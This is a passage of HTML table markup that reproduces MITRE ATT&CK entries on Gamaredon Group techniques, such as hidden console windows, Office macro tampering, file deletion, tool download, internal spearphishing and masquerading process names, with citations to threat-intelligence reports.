style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Enterprise</span></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1564"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">T1564</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1564/003"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">.003</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1564"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Hide Artifacts</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">: </span><a href="https://attack.mitre.org/techniques/T1564/003"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Hidden Window</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> has used </span><span style="font-size: 10.5pt; font-family: &quot; color: rgb(28, 34, 38); background-color: rgb(230, 230, 230); font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">hidcon</span><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> to run batch files in a hidden console window.</span><a href="https://unit42.paloaltonetworks.com/gamaredon-primitive-bear-ukraine-update-2021/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[8]</span></a></p></td></tr><tr style="height:29.25pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Enterprise</span></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1562"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">T1562</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1562/001"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">.001</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1562"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Impair Defenses</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">: </span><a href="https://attack.mitre.org/techniques/T1562/001"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Disable or Modify Tools</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> has delivered macros which can tamper with Microsoft Office security settings.</span><a href="https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[3]</span></a></p></td></tr><tr style="height:29.25pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Enterprise</span></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1070"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">T1070</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1070/004"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">.004</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1070"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Indicator Removal</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">: </span><a href="https://attack.mitre.org/techniques/T1070/004"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">File Deletion</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> tools can delete files used during an operation.</span><a href="https://blog.trendmicro.com/trendlabs-security-intelligence/gamaredon-apt-group-use-covid-19-lure-in-campaigns/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[2]</span></a><a href="https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-gamaredon-espionage-ukraine"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[4]</span></a><a href="https://www.ria.ee/sites/default/files/content-editors/kuberturve/tale_of_gamaredon_infection.pdf"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[9]</span></a></p></td></tr><tr style="height:29.25pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Enterprise</span></p></td><td colspan="2" style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1105"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">T1105</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1105"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Ingress Tool Transfer</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> has downloaded additional malware and tools onto a compromised host.</span><a href="https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[1]</span></a><a href="https://blog.trendmicro.com/trendlabs-security-intelligence/gamaredon-apt-group-use-covid-19-lure-in-campaigns/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[2]</span></a><a href="https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[3]</span></a><a href="https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[5]</span></a></p></td></tr><tr style="height:42.75pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Enterprise</span></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1559"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">T1559</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1559/001"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">.001</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1559"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Inter-Process Communication</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">: </span><a href="https://attack.mitre.org/techniques/T1559/001"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Component Object Model</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> malware can insert malicious macros into documents using a </span><span style="font-size: 10.5pt; font-family: &quot; color: rgb(28, 34, 38); background-color: rgb(230, 230, 230); font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Microsoft.Office.Interop</span><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> object.</span><a href="https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[3]</span></a></p></td></tr><tr style="height:42.75pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Enterprise</span></p></td><td colspan="2" style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1534"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">T1534</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1534"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Internal Spearphishing</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> has used an Outlook VBA module on infected systems to send phishing emails with malicious attachments to other employees within the organization.</span><a href="https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[3]</span></a></p></td></tr><tr style="height:42.75pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Enterprise</span></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1036"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">T1036</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1036/005"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">.005</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1036"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Masquerading</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">: </span><a href="https://attack.mitre.org/techniques/T1036/005"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Match Legitimate Name or Location</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> has used legitimate process names to hide malware including </span><span style="font-size: 10.5pt; font-family: &quot; color: rgb(28, 34, 38); background-color: rgb(230, 230, 230); font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">svchosst</span><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">.</span><a href="https://unit42.paloaltonetworks.com/gamaredon-primitive-bear-ukraine-update-2021/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[8]</span></a></p></td></tr><tr style="height:69.75pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Enterprise</span></p></td><td colspan="2" style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1112"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">T1112</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1112"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 